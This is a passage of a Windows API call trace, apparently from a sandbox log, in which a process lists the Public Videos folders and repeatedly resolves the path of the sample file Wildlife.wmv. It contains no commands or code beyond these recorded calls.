lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x917fa2ee, ftCreationTime.dwHighDateTime=0x1cbf8eb, ftLastAccessTime.dwLowDateTime=0xaa597fc2, ftLastAccessTime.dwHighDateTime=0x1cbf8eb, ftLastWriteTime.dwLowDateTime=0x917fa2ee, ftLastWriteTime.dwHighDateTime=0x1cbf8eb, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Recorded TV", cAlternateFileName="RECORD~1")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 1 [0246.659] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Videos", cAlternateFileName="")) returned 0 [0246.660] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.660] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.660] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\desktop.ini", lpFilePart=0x0) returned 0x1b [0246.660] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\desktop.ini", lpFilePart=0x0) returned 0x1b [0246.660] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\desktop.ini", lpFilePart=0x0) returned 0x1b [0246.660] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.660] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0246.660] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\", lpFilePart=0x0) returned 0x17 [0246.660] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0246.661] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.661] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.661] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.661] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.661] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos", lpFilePart=0x0) returned 0x16 [0246.661] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\", lpFilePart=0x0) returned 0x17 [0246.661] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.662] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0xfdb0c77c, ftCreationTime.dwHighDateTime=0x1ca0431, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.662] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x282dfaee, ftCreationTime.dwHighDateTime=0x1ca043f, ftLastAccessTime.dwLowDateTime=0x282dfaee, ftLastAccessTime.dwHighDateTime=0x1ca043f, ftLastWriteTime.dwLowDateTime=0x28886f39, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x17c, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.662] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 1 [0246.662] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="Sample Videos", cAlternateFileName="SAMPLE~1")) returned 0 [0246.662] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.662] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x22 [0246.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x22 [0246.662] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\desktop.ini", lpFilePart=0x0) returned 0x22 [0246.662] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.663] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos", lpFilePart=0x0) returned 0x24 [0246.663] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\", lpFilePart=0x0) returned 0x25 [0246.663] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0246.663] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 0 [0246.663] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.669] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e338) returned 1 [0246.669] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos", nBufferLength=0x105, lpBuffer=0x26de40, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos", lpFilePart=0x0) returned 0x24 [0246.669] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\", nBufferLength=0x105, lpBuffer=0x26de14, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\", lpFilePart=0x0) returned 0x25 [0246.669] FindFirstFileW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\*", lpFindFileData=0x26e060 | out: lpFindFileData=0x26e060*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName=".", cAlternateFileName="")) returned 0x6d28e8 [0246.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x11, ftCreationTime.dwLowDateTime=0x7fffaad0, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x802f4656, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="..", cAlternateFileName="")) returned 1 [0246.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x26, ftCreationTime.dwLowDateTime=0x802f4656, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7be12937, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x288d31f9, ftLastWriteTime.dwHighDateTime=0x1ca043f, nFileSizeHigh=0x0, nFileSizeLow=0x146, dwReserved0=0x0, dwReserved1=0x0, cFileName="desktop.ini", cAlternateFileName="")) returned 1 [0246.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x20, ftCreationTime.dwLowDateTime=0x80282235, ftCreationTime.dwHighDateTime=0x1ca0444, ftLastAccessTime.dwLowDateTime=0x7bda0516, ftLastAccessTime.dwHighDateTime=0x1ca0444, ftLastWriteTime.dwLowDateTime=0x7be12937, ftLastWriteTime.dwHighDateTime=0x1ca0444, nFileSizeHigh=0x0, nFileSizeLow=0x1907b8a, dwReserved0=0x0, dwReserved1=0x0, cFileName="Wildlife.wmv", cAlternateFileName="")) returned 1 [0246.669] FindNextFileW (in: hFindFile=0x6d28e8, lpFindFileData=0x26e070 | out: lpFindFileData=0x26e070*(dwFileAttributes=0x0, ftCreationTime.dwLowDateTime=0x0, ftCreationTime.dwHighDateTime=0x0, ftLastAccessTime.dwLowDateTime=0x0, ftLastAccessTime.dwHighDateTime=0x0, ftLastWriteTime.dwLowDateTime=0x0, ftLastWriteTime.dwHighDateTime=0x0, nFileSizeHigh=0x0, nFileSizeLow=0x0, dwReserved0=0x0, dwReserved1=0x0, cFileName="", cAlternateFileName="")) returned 0 [0246.669] FindClose (in: hFindFile=0x6d28e8 | out: hFindFile=0x6d28e8) returned 1 [0246.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e2f8) returned 1 [0246.669] SetThreadErrorMode (dwNewMode=0x0, lpOldMode=0x26e304) returned 1 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", lpFilePart=0x0) returned 0x30 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", lpFilePart=0x0) returned 0x30 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\desktop.ini", lpFilePart=0x0) returned 0x30 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.670] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26dde8, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] GetFullPathNameW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", nBufferLength=0x105, lpBuffer=0x26de64, lpFilePart=0x0 | out: lpBuffer="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv", lpFilePart=0x0) returned 0x31 [0246.671] SetThreadErrorMode (dwNewMode=0x1, lpOldMode=0x26e2c4) returned 1 [0246.671] GetFileAttributesExW (in: lpFileName="C:\\Users\\Public\\Videos\\Sample Videos\\Wildlife.wmv" (normalized: "c:\\users\\public\\videos\\sample 